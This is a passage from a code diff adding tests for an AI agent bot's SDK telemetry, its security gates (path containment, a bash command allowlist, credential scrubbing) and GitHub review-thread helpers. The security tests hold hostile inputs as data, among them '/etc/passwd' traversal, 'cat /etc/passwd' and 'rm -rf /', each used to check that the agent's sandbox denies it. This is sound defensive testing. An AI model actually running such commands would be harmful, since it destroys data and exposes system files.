test_maybe_raise_http_error_ignores_non_error_status(): + """A 2xx/1xx api_error_status must not mint an http_error stop.""" + from types import SimpleNamespace + msg = SimpleNamespace(is_error=True, api_error_status=200, result="weird", subtype="") + sdk_agent._maybe_raise_http_error(msg) # 200 is not 4xx/5xx -> no raise (regex fallback finds nothing) + + +# ── Tier-2: output_format / structured_output capture ── +# A hardened live smoke probe (tools/sdk_smoke.py) confirmed the Databricks +# gateway honours output_format json_schema: a clean {'verdict':'ok', +# 'findings':[]} dict on a subtype=success terminal ResultMessage. These unit +# tests pin the sdk_agent plumbing that surfaces it to callers. + +class ResultMessage: + # Class name drives _accumulate's dispatch (cls = type(msg).__name__), so it + # MUST be 'ResultMessage' for the terminal-message branch to fire. + def __init__(self, **kw): + self.__dict__.update(kw) + + +def test_accumulate_captures_structured_output(): + """When output_format is set, the validated dict arrives on + ResultMessage.structured_output; _accumulate must lift it onto + AgentResult.structured_output so the reviewer can drop finalize_review.""" + r = sdk_agent.AgentResult() + payload = {"verdict": "ok", "findings": []} + sdk_agent._accumulate(r, ResultMessage(structured_output=payload, subtype="success")) + assert r.structured_output == payload + + +def test_accumulate_leaves_structured_output_none_when_absent(): + """Tier-1 (no output_format): the terminal message has no structured_output + (or None), so AgentResult.structured_output stays None — existing callers + are unaffected.""" + r = sdk_agent.AgentResult() + assert r.structured_output is None + sdk_agent._accumulate(r, ResultMessage(structured_output=None, subtype="success")) + assert r.structured_output is None + # Attribute entirely absent (older SDK / non-output_format run) is also fine. + sdk_agent._accumulate(r, ResultMessage(subtype="success")) + assert r.structured_output is None + + +# ── Real per-run telemetry (replaces the reviewer observer 0/0/(none)) ── + +class ToolUseBlock: + def __init__(self, name, **kw): + self.name = name + self.input = kw.get("input", {}) + self.id = kw.get("id", "t1") + + +class TextBlock: + def __init__(self, text): + self.text = text + + +class ThinkingBlock: + def __init__(self, thinking): + self.thinking = thinking + + +class AssistantMessage: + def __init__(self, content): + self.content = content + + +def test_accumulate_records_every_tool_call(): + """_accumulate appends EVERY ToolUseBlock name (not just edit/bash) to + AgentResult.tool_calls, so the reviewer observer reports real tool usage + (read_paths/grep/finalize_review) instead of a hardcoded '(none)'.""" + r = sdk_agent.AgentResult() + sdk_agent._accumulate(r, AssistantMessage([ + ToolUseBlock("mcp__reviewer-tools__read_paths"), + ToolUseBlock("mcp__reviewer-tools__finalize_review"), + ])) + assert r.tool_calls == [ + "mcp__reviewer-tools__read_paths", + "mcp__reviewer-tools__finalize_review", + ] + + +def test_format_tool_input_shows_full_values_up_to_cap(): + out = sdk_agent._format_tool_input({ + "pattern": "Lz4Buffer", + "reason": "y" * 300, # well under the 500 cap + "paths": ["a.cs", "b.cs"], + }) + assert "pattern=Lz4Buffer" in out + assert "y" * 300 in out # full value (under cap), not truncated + assert "…" not in out # no marker when under cap + assert '["a.cs", "b.cs"]' in out # list rendered fully as compact JSON + + +def test_format_tool_input_caps_large_value_with_explicit_marker(): + out = sdk_agent._format_tool_input({"content": "x" * 5000}) + assert "x" * 5000 not in out # large value capped, not dumped whole + assert "…[+4500 chars]" in out # explicit dropped-char marker + assert len(out) < 600 # bounded near the 500 cap + + +def test_format_tool_input_flattens_newlines_to_one_line(): + out = sdk_agent._format_tool_input({"command": "dotnet build\ndotnet test"}) + assert "\n" not in out + assert "command=dotnet build dotnet test" in out + + +def test_accumulate_prints_live_per_turn_trace_for_tool_turns(capsys): + """A ToolUseBlock turn prints `[agent] turn N: tool=...` (and NOT a + `(no tool)` line).""" + r = sdk_agent.AgentResult() + sdk_agent._accumulate(r, AssistantMessage([ + ToolUseBlock( + "mcp__reviewer-tools__grep", + input={"pattern": "foo", "path": "csharp/src/"}, + ), + ])) + out = capsys.readouterr().out + assert "[agent] turn 1: tool=mcp__reviewer-tools__grep" in out + assert "pattern=foo" in out + assert "(no tool)" not in out + + +def test_accumulate_logs_text_only_turn(capsys): + """A turn with no tool call still logs `[agent] turn N: (no tool) ...` so + every turn is accounted for (and a slow thinking turn is visible).""" + r = sdk_agent.AgentResult() + sdk_agent._accumulate(r, AssistantMessage([ + TextBlock("Let me think about this before acting."), + ])) + out = capsys.readouterr().out + assert "[agent] turn 1: (no tool)" in out + assert "Let me think about this before acting." in out + + +def test_accumulate_logs_thinking_only_turn(capsys): + """A thinking-only turn (ThinkingBlock, no text/tool) surfaces the thinking + content as `(thinking) ...` instead of a blank `(no tool)` line.""" + r = sdk_agent.AgentResult() + sdk_agent._accumulate(r, AssistantMessage([ + ThinkingBlock("First I should read the file, then check the callers."), + ])) + out = capsys.readouterr().out + assert "[agent] turn 1: (thinking)" in out + assert "First I should read the file" in out + + +def test_accumulate_captures_usage_and_cost(): + """A terminal ResultMessage with `usage` + `total_cost_usd` populates the + token/cost fields the observer logs.""" + r = sdk_agent.AgentResult() + sdk_agent._accumulate(r, ResultMessage( + usage={"input_tokens": 1200, "output_tokens": 340}, + total_cost_usd=0.0123, subtype="success", + )) + assert r.prompt_tokens == 1200 + assert r.completion_tokens == 340 + assert abs(r.total_cost_usd - 0.0123) < 1e-9 + + +def test_accumulate_telemetry_defaults_when_absent(): + """No usage/cost on the terminal message → fields stay at their 0 defaults + (a missing-usage run, or the SDK absent in tests, is safe).""" + r = sdk_agent.AgentResult() + sdk_agent._accumulate(r, ResultMessage(subtype="success")) + assert r.prompt_tokens == 0 + assert r.completion_tokens == 0 + assert r.total_cost_usd == 0.0 + assert r.tool_calls == [] + + +def test_accumulate_sums_cache_tokens_into_prompt_tokens(): + """prompt_tokens reflects the FULL input the model processed: with prompt + caching, input_tokens is tiny (the uncached delta) and the bulk is in + cache_creation/cache_read. Summing all three is what makes 'did the diff + reach the model?' answerable (a cached 6k-token prompt must not read as 3).""" + r = sdk_agent.AgentResult() + sdk_agent._accumulate(r, ResultMessage( + usage={ + "input_tokens": 3, + "cache_creation_input_tokens": 0, + "cache_read_input_tokens": 6000, + "output_tokens": 800, + }, + subtype="success", + )) + assert r.prompt_tokens == 6003 + assert r.completion_tokens == 800 diff --git a/scripts/shared/tests/test_sdk_security.py b/scripts/shared/tests/test_sdk_security.py new file mode 100644 index 000000000..e555d64a6 --- /dev/null +++ b/scripts/shared/tests/test_sdk_security.py @@ -0,0 +1,153 @@ +"""Tests for the SDK security gates (sdk_security). + +The PreToolUse hooks and can_use_tool callback are async and require the +SDK types only at registration time (make_pre_tool_hooks); the underlying +gate *logic* is synchronous and SDK-independent, so we test it directly: + - _resolve_inside (safe_path containment: invariants #1/#2/#9/#35) + - bash_command_allowed (argv allowlist: invariant #3) + - scrubbed_env (env_scrub passthrough: invariant #5) +These mirror scripts/engineer_bot/tools.py + env_scrub.py semantics. +""" +import asyncio +from pathlib import Path + +from scripts.shared import sdk_security + + +# ── safe_path containment (_resolve_inside) ── + +def test_inside_root_allowed(tmp_path): + assert sdk_security._resolve_inside(tmp_path, (), "tests/foo.cs") is not None + + +def test_parent_traversal_denied(tmp_path): + assert sdk_security._resolve_inside(tmp_path, (), "../escape.txt") is None + + +def test_absolute_path_outside_denied(tmp_path): + assert sdk_security._resolve_inside(tmp_path, (), "/etc/passwd") is None + + +def test_denied_subpath_directory(tmp_path): + denied = (tmp_path / "driver",) + assert sdk_security._resolve_inside(tmp_path, denied, "driver/secret.cs") is None + assert sdk_security._resolve_inside(tmp_path, denied, "tests/ok.cs") is not None + + +def test_denied_subpath_exact_file(tmp_path): + """A file entry in denied_subpaths denies exactly that file + (is_relative_to is True for equal paths).""" + denied = (tmp_path / ".gitleaksignore",) + assert sdk_security._resolve_inside(tmp_path, denied, ".gitleaksignore") is None + assert sdk_security._resolve_inside(tmp_path, denied, "other") is not None + + +def test_symlink_escape_denied(tmp_path): + outside = tmp_path.parent / "outside_target" + outside.mkdir(exist_ok=True) + link = tmp_path / "link" + link.symlink_to(outside) + # resolve() follows the symlink; the target is outside the root. + assert sdk_security._resolve_inside(tmp_path, (), "link/file.txt") is None + + +# ── bash argv allowlist ── + +_ALLOW = (("dotnet", "build"), ("dotnet", "test"), ("git", "diff", "HEAD")) + + +def test_bash_allowed_prefix(): + assert sdk_security.bash_command_allowed("dotnet build MyProj.csproj", _ALLOW) + assert sdk_security.bash_command_allowed("git diff HEAD", _ALLOW) + + +def test_bash_denied_not_in_list(): + assert not sdk_security.bash_command_allowed("cat /etc/passwd", _ALLOW) + assert not sdk_security.bash_command_allowed("ls -la", _ALLOW) + + +def test_bash_denied_subcommand_mismatch(): + """('dotnet','build') must NOT permit `dotnet tool install`.""" + assert not sdk_security.bash_command_allowed("dotnet tool install -g evil", _ALLOW) + + +def test_bash_empty_and_unparseable_denied(): + assert not sdk_security.bash_command_allowed("", _ALLOW) + assert not sdk_security.bash_command_allowed('git diff "unterminated', _ALLOW) + + +# ── env scrub (delegates to env_scrub.scrub, verbatim table) ── + +def test_scrub_strips_credentials(): + src = { + "DATABRICKS_TOKEN": "secret", + "GITHUB_APP_PRIVATE_KEY": "k", + "MY_API_KEY": "k", + "AWS_ACCESS_KEY_ID": "k", + "SOME_PASSWORD": "p", + } + out = sdk_security.scrubbed_env(src) + assert out == {} + + +def test_scrub_keeps_non_credential_config(): + """The deliberate no-blanket-prefix rule: DATABRICKS_TEST_CONFIG_FILE + must survive (the bash tool's dotnet-test invocation needs it).""" + src = { + "DATABRICKS_TEST_CONFIG_FILE": "/cfg.json", + "DATABRICKS_TOKEN": "secret", + "PATH": "/usr/bin", + } + out = sdk_security.scrubbed_env(src) + assert out == {"DATABRICKS_TEST_CONFIG_FILE": "/cfg.json", "PATH": "/usr/bin"} + + +# ── async hook smoke (logic only; no SDK runtime required) ── + +def test_safe_path_hook_denies_escape(tmp_path): + hook = sdk_security.make_safe_path_hook(tmp_path, ()) + out = asyncio.run(hook( + {"tool_name": "Read", "tool_input": {"file_path": "../../etc/passwd"}}, + "tid", None, + )) + assert out["hookSpecificOutput"]["permissionDecision"] == "deny" + + +def test_safe_path_hook_allows_inside(tmp_path): + hook = sdk_security.make_safe_path_hook(tmp_path, ()) + out = asyncio.run(hook( + {"tool_name": "Read", "tool_input": {"file_path": "tests/a.cs"}}, + "tid", None, + )) + assert out == {} # empty == allow + + +def test_bash_hook_denies_and_clamps(tmp_path): + hook = sdk_security.make_bash_allowlist_hook(_ALLOW, timeout=900) + denied = asyncio.run(hook( + {"tool_name": "Bash", "tool_input": {"command": "rm -rf /"}}, "tid", None, + )) + assert denied["hookSpecificOutput"]["permissionDecision"] == "deny" + allowed = asyncio.run(hook( + {"tool_name": "Bash", "tool_input": {"command": "dotnet build"}}, "tid", None, + )) + assert allowed["hookSpecificOutput"]["permissionDecision"] == "allow" + assert allowed["tool_input"]["timeout"] == 900 * 1000 # clamped to ms + + +def test_can_use_tool_enforces_path_and_bash_for_mcp_names(tmp_path): + """make_can_use_tool must apply safe_path + bash allowlist to MCP-qualified + @tool names (mcp__engineer-tools__edit_file / __bash), not just built-ins. + (Review #445 [7]/[8])""" + cb = sdk_security.make_can_use_tool( + tmp_path, denied_subpaths=(), bash_allowlist=(("git", "status"),), + allowed_tool_names=("mcp__engineer-tools__edit_file", "mcp__engineer-tools__bash"), + ) + deny = asyncio.run(cb("mcp__engineer-tools__edit_file", {"path": "../../etc/passwd"}, None)) + assert deny["behavior"] == "deny" + allow = asyncio.run(cb("mcp__engineer-tools__edit_file", {"path": "tests/a.cs"}, None)) + assert allow["behavior"] == "allow" + bad_bash = asyncio.run(cb("mcp__engineer-tools__bash", {"cmd": "rm -rf /"}, None)) + assert bad_bash["behavior"] == "deny" + ok_bash = asyncio.run(cb("mcp__engineer-tools__bash", {"cmd": "git status"}, None)) + assert ok_bash["behavior"] == "allow" diff --git a/scripts/shared/tests/test_threads.py b/scripts/shared/tests/test_threads.py new file mode 100644 index 000000000..3eff9b33f --- /dev/null +++ b/scripts/shared/tests/test_threads.py @@ -0,0 +1,290 @@ +"""Tests for shared.threads — review-comment tree walking.""" +from __future__ import annotations + +from scripts.shared import threads + + +def _c(cid: int, in_reply_to=None, body=""): + return { + "id": cid, + "in_reply_to_id": in_reply_to, + "body": body, + "created_at": f"2026-01-01T00:00:{cid:02d}Z", + } + + +class TestFindRoot: + def test_single_comment_is_its_own_root(self): + assert threads.find_root([_c(1)], target_id=1)["id"] == 1 + + def test_two_level_reply_walks_to_root(self): + comments = [_c(1), _c(2, in_reply_to=1)] + assert threads.find_root(comments, target_id=2)["id"] == 1 + + def test_deep_chain_walks_to_root(self): + comments = [_c(1), _c(2, 1), _c(3, 2), _c(4, 3)] + assert threads.find_root(comments, target_id=4)["id"] == 1 + + def test_unknown_target_returns_none(self): + assert threads.find_root([_c(1)], target_id=99) is None + + def test_cycle_does_not_infinite_loop(self): + comments = [_c(2, 3), _c(3, 2)] + assert threads.find_root(comments, target_id=2) is None + + +class TestWalkThread: + def test_root_with_no_replies(self): + result = threads.walk_thread([_c(1)], root_id=1) + assert [c["id"] for c in result] == [1] + + def test_root_with_two_direct_replies(self): + comments = [_c(1), _c(2, 1), _c(3, 1)] + assert sorted(c["id"] for c in threads.walk_thread(comments, 1)) == [1, 2, 3] + + def test_nested_replies_included(self): + comments = [_c(1), _c(2, 1), _c(3, 2), _c(4, 3)] + assert sorted(c["id"] for c in threads.walk_thread(comments, 1)) == [1, 2, 3, 4] + + def test_replies_are_chronological(self): + comments = [ + _c(1), + {**_c(3, 1), "created_at": "2026-01-01T00:00:05Z"}, + {**_c(2, 1), "created_at": "2026-01-01T00:00:10Z"}, + ] + assert [c["id"] for c in threads.walk_thread(comments, 1)] == [1, 3, 2] + + def test_other_thread_excluded(self): + comments = [_c(1), _c(2, 1), _c(10), _c(11, 10)] + assert sorted(c["id"] for c in threads.walk_thread(comments, 1)) == [1, 2] + + +def _c2(cid, *, in_reply_to=None, body="", user="alice", created_at=None): + return { + "id": cid, + "in_reply_to_id": in_reply_to, + "body": body, + "created_at": created_at or f"2026-01-01T00:00:{cid:02d}Z", + "user": {"login": user}, + } + + +def _is_eng_bot(c): + return "", + created_at="2026-01-01T00:00:02Z"), + ] + assert threads.find_unaddressed_threads( + comments, + is_bot_reply=_is_eng_bot, + bot_login_prefix="peco-engineer-bot", + max_replies_per_thread=3, + ) == [] + + def test_reviewer_replies_after_bot_reopens_thread(self): + comments = [ + _c2(1, user="peco-review-bot[bot]", body="finding", + created_at="2026-01-01T00:00:01Z"), + _c2(2, in_reply_to=1, user="peco-engineer-bot[bot]", + body="fixed\n", + created_at="2026-01-01T00:00:02Z"), + _c2(3, in_reply_to=2, user="eric", + body="not quite — also need X", + created_at="2026-01-01T00:00:03Z"), + ] + result = threads.find_unaddressed_threads( + comments, + is_bot_reply=_is_eng_bot, + bot_login_prefix="peco-engineer-bot", + max_replies_per_thread=3, + ) + assert len(result) == 1 + assert [c["id"] for c in result[0]] == [1, 2, 3] + + def test_thread_at_cap_is_skipped_even_with_newer_human_reply(self): + comments = [ + _c2(1, user="peco-review-bot[bot]", + created_at="2026-01-01T00:00:01Z"), + _c2(2, in_reply_to=1, user="peco-engineer-bot[bot]", + body="r1\n", + created_at="2026-01-01T00:00:02Z"), + _c2(3, in_reply_to=1, user="peco-engineer-bot[bot]", + body="r2\n", + created_at="2026-01-01T00:00:03Z"), + _c2(4, in_reply_to=1, user="peco-engineer-bot[bot]", + body="r3\n", + created_at="2026-01-01T00:00:04Z"), + _c2(5, in_reply_to=1, user="eric", body="keep going", + created_at="2026-01-01T00:00:05Z"), + ] + assert threads.find_unaddressed_threads( + comments, + is_bot_reply=_is_eng_bot, + bot_login_prefix="peco-engineer-bot", + max_replies_per_thread=3, + ) == [] + + def test_thread_whose_root_is_engineer_bot_is_skipped(self): + comments = [ + _c2(1, user="peco-engineer-bot[bot]", + body="engineer-bot-opened review thread (defense in depth)"), + _c2(2, in_reply_to=1, user="peco-review-bot[bot]", body="reply"), + ] + assert threads.find_unaddressed_threads( + comments, + is_bot_reply=_is_eng_bot, + bot_login_prefix="peco-engineer-bot", + max_replies_per_thread=3, + ) == [] + + def test_multiple_threads_returned_oldest_first(self): + comments = [ + _c2(10, user="peco-review-bot[bot]", body="finding A", + created_at="2026-01-01T10:00:00Z"), + _c2(20, user="peco-review-bot[bot]", body="finding B", + created_at="2026-01-01T09:00:00Z"), + _c2(30, user="Copilot", body="finding C", + created_at="2026-01-01T11:00:00Z"), + ] + result = threads.find_unaddressed_threads( + comments, + is_bot_reply=_is_eng_bot, + bot_login_prefix="peco-engineer-bot", + max_replies_per_thread=3, + ) + assert [t[0]["id"] for t in result] == [20, 10, 30] + + def test_thread_unrelated_to_bot_marker_is_returned(self): + """A human reviewer's thread (no bot involvement) is just as + unaddressed as a peco-review-bot one — engineer-bot reacts to + all reviewers, not only bot reviewers.""" + comments = [_c2(1, user="alice", body="please refactor X")] + result = threads.find_unaddressed_threads( + comments, + is_bot_reply=_is_eng_bot, + bot_login_prefix="peco-engineer-bot", + max_replies_per_thread=3, + ) + assert len(result) == 1 + assert result[0][0]["id"] == 1 + + def test_thread_with_only_bot_markered_comments_is_skipped(self): + """If every comment in a thread carries the bot marker (e.g. + a non-bot login posted text that quotes one of the bot's prior + marker strings), there's no actual reviewer ask. The explicit + non-bot guard skips this rather than relying on `""` vs ISO + timestamp string ordering working out to False by accident.""" + comments = [ + _c2(1, user="alice", + body="reposted: ", + created_at="2026-01-01T00:00:01Z"), + ] + # is_bot_reply matches on marker → the only comment is a bot + # reply by predicate → no non-bot comments → skip. + assert threads.find_unaddressed_threads( + comments, + is_bot_reply=_is_eng_bot, + bot_login_prefix="peco-engineer-bot", + max_replies_per_thread=3, + ) == [] + + def test_same_second_timestamps_tiebreak_by_id(self): + """Burst review: bot replies and reviewer posts in the same + second. ISO timestamps tie; the later GitHub comment ID is + the later comment. Re-engagement should fire on the reviewer + reply even when `created_at` strings are equal.""" + comments = [ + _c2(1, user="peco-review-bot[bot]", body="finding", + created_at="2026-01-01T00:00:00Z"), + _c2(2, in_reply_to=1, user="peco-engineer-bot[bot]", + body="fix\n", + created_at="2026-01-01T00:00:05Z"), + _c2(3, in_reply_to=2, user="eric", + body="not quite", + created_at="2026-01-01T00:00:05Z"), + ] + result = threads.find_unaddressed_threads( + comments, + is_bot_reply=_is_eng_bot, + bot_login_prefix="peco-engineer-bot", + max_replies_per_thread=3, + ) + assert len(result) == 1, "id=3 reply (same second, later id) should re-open" + + def test_is_bot_authored_excludes_error_replies_from_non_bot(self): + """If `is_bot_reply` excludes \`action=error\` replies (the + engineer-bot pattern) but we use it for BOTH cap-counting AND + the non_bot timestamp comparison, an error reply gets treated + as a fresh reviewer ask and the bot re-engages on its own + crash notice. The separate `is_bot_authored` predicate fixes + this — it matches error replies too, so they don't appear + in `non_bot`.""" + # Eng-bot predicates that mimic the production pattern: + # `_is_bot_reply` excludes action=error; `_is_bot_authored` + # includes it. + def _eng_authored(c): + return "", + created_at="2026-01-01T00:00:02Z"), + _c2(3, in_reply_to=2, user="peco-engineer-bot[bot]", + body="crashed\n", + created_at="2026-01-01T00:00:03Z"), + ] + # Without passing is_bot_authored, the bug WOULD show: the + # error reply at id=3 is classified as non_bot (per + # _eng_reply) — its timestamp is the latest of any non-bot + # comment — so non_bot_time > bot_time and the thread + # re-opens on the bot's own crash. + bug_result = threads.find_unaddressed_threads( + comments, + is_bot_reply=_eng_reply, + bot_login_prefix="peco-engineer-bot", + max_replies_per_thread=3, + ) + assert len(bug_result) == 1, "demonstrates the bug — wrong re-engage" + # With is_bot_authored, the error reply is correctly classified + # as bot-authored → not in non_bot → thread stays skipped. + fixed_result = threads.find_unaddressed_threads( + comments, + is_bot_reply=_eng_reply, + is_bot_authored=_eng_authored, + bot_login_prefix="peco-engineer-bot", + max_replies_per_thread=3, + ) + assert fixed_result == [], "fixed — error reply is bot-authored, no re-engage" diff --git a/scripts/shared/threads.py b/scripts/shared/threads.py new file mode 100644 index 000000000..02e8d5488 --- /dev/null +++ b/scripts/shared/threads.py @@ -0,0 +1,150 @@ +"""Pure tree-walking helpers for GitHub PR review comments. + +Network I/O is the caller's responsibility — pass the list of comment +dicts in. Each comment dict must have `id`, `in_reply_to_id` (None for +roots), `body`, `created_at`. The shape matches what `gh api +.../pulls/N/comments` returns. +""" +from __future__ import annotations + +from typing import Any, Callable, Optional + + +def find_root(comments: list[dict[str, Any]], target_id: int) -> Optional[dict[str, Any]]: + by_id = {c["id"]: c for c in comments} + cur = by_id.get(target_id) + if cur is None: + return None + seen: set[int] = set() + while True: + if cur["id"] in seen: + return None + seen.add(cur["id"]) + parent_id = cur.get("in_reply_to_id") + if parent_id is None or parent_id not in by_id: + return cur + cur = by_id[parent_id] + + +def walk_thread(comments: list[dict[str, Any]], root_id: int) -> list[dict[str, Any]]: + by_id = {c["id"]: c for c in comments} + if root_id not in by_id: + return [] + children: dict[int, list[int]] = {} + for c in comments: + parent = c.get("in_reply_to_id") + if parent is not None: + children.setdefault(parent, []).append(c["id"]) + + out: list[dict[str, Any]] = [] + stack = [root_id] + seen: set[int] = set() + while stack: + cid = stack.pop() + if cid in seen: + continue + seen.add(cid) + out.append(by_id[cid]) + stack.extend(children.get(cid, [])) + out.sort(key=lambda c: c.get("created_at", "")) + return out + + +def find_unaddressed_threads( + comments: list[dict[str, Any]], + *, + is_bot_reply: Callable[[dict[str, Any]], bool], + bot_login_prefix: str, + max_replies_per_thread: int, + is_bot_authored: Optional[Callable[[dict[str, Any]], bool]] = None, +) -> list[list[dict[str, Any]]]: + """Return threads that engineer-bot still needs to engage with. + + A thread is "unaddressed" when ALL of: + - Its root was NOT authored by engineer-bot (skip the bot's own + comments — defense in depth, today the bot never opens a + review thread). + - The total count of bot-replies in the thread is strictly less + than `max_replies_per_thread`. Bounds cross-bot ping-pong. + - There is NO prior bot reply, OR the latest non-bot comment is + newer than the latest bot reply. The second clause handles + "I replied; reviewer pushed back; I should look again." + Without it the bot would re-process every thread on every + run; with only "no prior bot reply" we'd never re-engage on + a contested thread. + + Each returned element is the thread's comments in creation order + (matching `walk_thread`'s output). The list of threads is sorted + by root `created_at` so callers process oldest-first. + + Args: + comments: full PR review-comment list (e.g. from + `github_ops.list_pr_review_comments`). + is_bot_reply: predicate returning True if a comment counts + toward `max_replies_per_thread`. Substantive bot replies + only — typically EXCLUDES infrastructure notices (e.g. + `action=error` crash replies) so transient crashes don't + consume the cap. + bot_login_prefix: prefix of engineer-bot's GitHub user login + (e.g. `"peco-engineer-bot"`). Threads whose ROOT login starts + with this prefix are skipped. + max_replies_per_thread: hard cap on bot replies per thread. + is_bot_authored: predicate returning True if a comment is from + the bot AT ALL (regardless of substantive vs infrastructure + kind). Used to identify the reviewer ask via the + "latest comment NOT from the bot" rule. When omitted, + defaults to `is_bot_reply` for back-compat. Engineer-bot + callers should pass a separate predicate that DOES match + error replies — an `action=error` reply is still "from the + bot," and treating it as a fresh reviewer ask causes + spurious re-engagement on transient crashes. + """ + if is_bot_authored is None: + is_bot_authored = is_bot_reply + if not comments: + return [] + roots: list[dict[str, Any]] = [ + c for c in comments if c.get("in_reply_to_id") is None + ] + out: list[list[dict[str, Any]]] = [] + for root in roots: + root_login = (root.get("user") or {}).get("login") or "" + if root_login.startswith(bot_login_prefix): + continue + thread = walk_thread(comments, root["id"]) + if not thread: + continue + bot_replies = [c for c in thread if is_bot_reply(c)] + if len(bot_replies) >= max_replies_per_thread: + continue + if not bot_replies: + out.append(thread) + continue + # Re-engagement: latest non-bot comment AFTER latest bot reply. + # `non_bot` filters via `is_bot_authored` (not `is_bot_reply`) + # so an `action=error` reply that DOESN'T count toward the + # cap still counts as bot-authored — preventing the bot's own + # crash notice from being misclassified as a fresh reviewer + # ask. + non_bot = [c for c in thread if not is_bot_authored(c)] + if not non_bot: + # Every comment in the thread is bot-markered (e.g. root + # contains a marker substring quoted from review text, or + # a reviewer's comment was deleted). No reviewer ask to + # react to — skip explicitly rather than relying on + # empty-string ordering against an ISO timestamp. + continue + # Compare by (created_at, id) so threads with same-second + # timestamps (a real possibility during a multi-comment review + # burst) tie-break on monotonic GitHub comment IDs — the later + # ID is reliably the later comment. Strict `>` on ISO strings + # alone would skip a reviewer reply posted in the same second + # as the bot's reply ("not after, so stale"). + def _key(c): + return (c.get("created_at", ""), c.get("id", 0)) + latest_bot_key = max(_key(c) for c in bot_replies) + latest_non_bot_key = max(_key(c) for c in non_bot) + if latest_non_bot_key > latest_bot_key: + out.append(thread) + out.sort(key=lambda t: t[0].get("created_at", "")) + return out